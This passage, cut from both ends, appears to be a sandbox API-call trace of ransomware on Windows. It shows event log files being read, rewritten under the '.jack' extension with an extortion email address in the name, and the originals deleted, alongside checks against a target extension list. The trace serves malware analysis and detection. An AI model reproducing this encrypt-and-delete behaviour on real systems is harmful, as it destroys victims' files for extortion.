lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0208.856] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0208.856] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x13e, lpOverlapped=0x0) returned 1 [0208.856] SetEndOfFile (hFile=0x3dc) returned 1 [0208.857] CloseHandle (hObject=0x3dc) returned 1 [0208.858] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.858] SetEndOfFile (hFile=0x430) returned 1 [0208.859] CloseHandle (hObject=0x430) returned 1 [0208.859] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0208.860] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx")) returned 1 [0208.860] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.860] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.860] lstrlenW (lpString=".doc") returned 4 [0208.860] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.860] lstrlenW (lpString=".docx") returned 5 [0208.860] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.860] lstrlenW (lpString=".pdf") returned 4 [0208.860] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.860] lstrlenW (lpString=".xls") returned 4 [0208.860] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.860] lstrlenW (lpString=".xlsx") returned 5 [0208.860] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.860] lstrlenW (lpString=".ppt") returned 4 [0208.860] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.860] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.860] lstrlenW (lpString=".zip") returned 4 [0208.860] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.860] lstrlenW (lpString=".rar") returned 4 [0208.861] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.861] lstrlenW (lpString=".bz2") returned 4 [0208.861] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.861] lstrlenW (lpString=".7z") returned 3 [0208.861] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.861] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.861] lstrlenW (lpString=".dbf") returned 4 [0208.861] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.861] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.861] lstrlenW (lpString=".1cd") returned 4 [0208.861] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.861] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.861] lstrlenW (lpString=".jpg") returned 4 [0208.861] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.861] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.861] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.861] lstrlenW (lpString=".doc") returned 4 [0208.861] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0208.861] lstrlenW (lpString=".docx") returned 5 [0208.861] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0208.861] lstrlenW (lpString=".pdf") returned 4 [0208.861] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0208.861] lstrlenW (lpString=".xls") returned 4 [0208.861] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0208.861] lstrlenW (lpString=".xlsx") returned 5 [0208.861] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0208.861] lstrlenW (lpString=".ppt") returned 4 [0208.861] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0208.861] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.861] lstrlenW (lpString=".zip") returned 4 [0208.861] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0208.862] lstrlenW (lpString=".rar") returned 4 [0208.862] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0208.862] lstrlenW (lpString=".bz2") returned 4 [0208.862] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0208.862] lstrlenW (lpString=".7z") returned 3 [0208.862] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0208.862] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.862] lstrlenW (lpString=".dbf") returned 4 [0208.862] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0208.862] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.862] lstrlenW (lpString=".1cd") returned 4 [0208.862] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0208.862] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned 61 [0208.862] lstrlenW (lpString=".jpg") returned 4 [0208.862] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0208.862] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0208.862] lstrlenW (lpString="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 51 [0208.862] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0208.862] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0208.862] CloseHandle (hObject=0x430) returned 1 [0208.863] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx")) returned 0x20 [0208.863] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.863] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0208.863] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.863] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.863] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0209.347] GetLastError () returned 0x0 [0209.347] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.518] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.520] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.520] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x13a, lpOverlapped=0x0) returned 1 [0209.520] SetEndOfFile (hFile=0x3dc) returned 1 [0209.525] CloseHandle (hObject=0x3dc) returned 1 [0209.531] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.531] SetEndOfFile (hFile=0x430) returned 1 [0209.544] CloseHandle (hObject=0x430) returned 1 [0209.550] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.551] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx")) returned 1 [0209.566] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.566] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.566] lstrlenW (lpString=".doc") returned 4 [0209.566] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.566] lstrlenW (lpString=".docx") returned 5 [0209.566] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.566] lstrlenW (lpString=".pdf") returned 4 [0209.566] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.566] lstrlenW (lpString=".xls") returned 4 [0209.566] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.566] lstrlenW (lpString=".xlsx") returned 5 [0209.566] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.566] lstrlenW (lpString=".ppt") returned 4 [0209.566] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.566] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.566] lstrlenW (lpString=".zip") returned 4 [0209.566] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.566] lstrlenW (lpString=".rar") returned 4 [0209.566] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.566] lstrlenW (lpString=".bz2") returned 4 [0209.566] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.567] lstrlenW (lpString=".7z") returned 3 [0209.567] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.567] lstrlenW (lpString=".dbf") returned 4 [0209.567] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.567] lstrlenW (lpString=".1cd") returned 4 [0209.567] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.567] lstrlenW (lpString=".jpg") returned 4 [0209.567] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.567] lstrlenW (lpString=".doc") returned 4 [0209.567] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.567] lstrlenW (lpString=".docx") returned 5 [0209.567] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.567] lstrlenW (lpString=".pdf") returned 4 [0209.567] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.567] lstrlenW (lpString=".xls") returned 4 [0209.567] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.567] lstrlenW (lpString=".xlsx") returned 5 [0209.567] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.567] lstrlenW (lpString=".ppt") returned 4 [0209.567] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.567] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.567] lstrlenW (lpString=".zip") returned 4 [0209.567] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.568] lstrlenW (lpString=".rar") returned 4 [0209.568] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.568] lstrlenW (lpString=".bz2") returned 4 [0209.568] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.568] lstrlenW (lpString=".7z") returned 3 [0209.568] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.568] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.568] lstrlenW (lpString=".dbf") returned 4 [0209.568] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.568] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.568] lstrlenW (lpString=".1cd") returned 4 [0209.568] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.568] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0209.568] lstrlenW (lpString=".jpg") returned 4 [0209.568] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.568] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.568] lstrlenW (lpString="Microsoft-Windows-LiveId%4Operational.evtx") returned 42 [0209.568] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0209.569] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0209.569] CloseHandle (hObject=0x420) returned 1 [0209.574] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx")) returned 0x20 [0209.574] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.576] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0209.576] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.576] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.576] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0209.582] GetLastError () returned 0x0 [0209.582] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.588] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.594] ReadFile (in: hFile=0x44c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.594] WriteFile (in: hFile=0x3dc, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x128, lpOverlapped=0x0) returned 1 [0209.594] SetEndOfFile (hFile=0x3dc) returned 1 [0209.600] CloseHandle (hObject=0x3dc) returned 1 [0209.613] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.613] SetEndOfFile (hFile=0x44c) returned 1 [0209.627] CloseHandle (hObject=0x44c) returned 1 [0209.630] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.630] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx")) returned 1 [0209.673] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.673] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.673] lstrlenW (lpString=".doc") returned 4 [0209.673] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.673] lstrlenW (lpString=".docx") returned 5 [0209.673] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.673] lstrlenW (lpString=".pdf") returned 4 [0209.674] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString=".xls") returned 4 [0209.674] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString=".xlsx") returned 5 [0209.674] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.674] lstrlenW (lpString=".ppt") returned 4 [0209.674] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.674] lstrlenW (lpString=".zip") returned 4 [0209.674] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString=".rar") returned 4 [0209.674] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString=".bz2") returned 4 [0209.674] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString=".7z") returned 3 [0209.674] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.674] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.674] lstrlenW (lpString=".dbf") returned 4 [0209.674] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.674] lstrlenW (lpString=".1cd") returned 4 [0209.674] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.674] lstrlenW (lpString=".jpg") returned 4 [0209.674] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.674] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.674] lstrlenW (lpString=".doc") returned 4 [0209.674] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString=".docx") returned 5 [0209.674] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.674] lstrlenW (lpString=".pdf") returned 4 [0209.674] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString=".xls") returned 4 [0209.674] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.674] lstrlenW (lpString=".xlsx") returned 5 [0209.674] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.675] lstrlenW (lpString=".ppt") returned 4 [0209.675] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.675] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.675] lstrlenW (lpString=".zip") returned 4 [0209.675] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.675] lstrlenW (lpString=".rar") returned 4 [0209.675] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.675] lstrlenW (lpString=".bz2") returned 4 [0209.675] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.675] lstrlenW (lpString=".7z") returned 3 [0209.675] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.675] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.675] lstrlenW (lpString=".dbf") returned 4 [0209.675] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.675] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.675] lstrlenW (lpString=".1cd") returned 4 [0209.675] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.675] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0209.675] lstrlenW (lpString=".jpg") returned 4 [0209.675] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.675] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.675] lstrlenW (lpString="Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 50 [0209.675] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0209.684] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0209.684] CloseHandle (hObject=0x3dc) returned 1 [0209.684] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx")) returned 0x20 [0209.684] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.684] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0209.684] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.684] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.684] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0209.688] GetLastError () returned 0x0 [0209.688] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.700] WriteFile (in: hFile=0x420, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.702] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.702] WriteFile (in: hFile=0x420, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x138, lpOverlapped=0x0) returned 1 [0209.702] SetEndOfFile (hFile=0x420) returned 1 [0209.702] CloseHandle (hObject=0x420) returned 1 [0209.704] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.704] SetEndOfFile (hFile=0x3dc) returned 1 [0209.705] CloseHandle (hObject=0x3dc) returned 1 [0209.705] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.705] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx")) returned 1 [0209.708] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.708] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 58 [0209.708] lstrlenW (lpString=".doc") returned 4 [0209.708] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.708] lstrlenW (lpString=".docx") returned 5 [0209.708] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.708] lstrlenW (lpString=".pdf") returned 4 [0209.708] lstrcmpiW 